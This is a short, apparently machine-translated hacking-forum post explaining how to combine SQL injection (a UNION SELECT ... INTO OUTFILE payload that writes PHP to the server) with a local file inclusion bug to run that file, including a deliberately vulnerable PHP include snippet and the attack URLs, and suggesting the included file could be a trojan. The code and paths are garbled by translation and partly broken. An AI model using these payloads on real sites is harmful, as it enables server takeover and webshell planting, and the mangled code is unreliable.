Author: Leng yuedu cloud
Thank you for your article. First, assume that our website has the SQL injection vulnerability and a local Inclusion Vulnerability!
Magic_quotes_gpc = off in PHP. INI
We reinjected the point and determined it was the ROOT permission!
Www.lengyueduyun.com/index.php? Id = 2 union select 1, 2, 3, 4, where <? Phpinfo ();?> Hexadecimal conversion, 5, 6 into outfile D: \ duyun \ 1.php;
In this way, the 1.php content is <? Phpinfo ();?> Sorry! The following code contains the vulnerability! Save as index. php ~ You don't have to follow me ~ I'm just making assumptions.
<? Php
$ Fuck = $ _ GET ["fuck"];
If ($ fuck ){
Include $ _ GET ["fuck"];
}
?>
Enter www.lengyueduyun.com/index.php in the following browser? Fuck = D: duyun1.php
In this way, you can see the path of the WEB.
In addition, the contained files can be a Trojan horse ..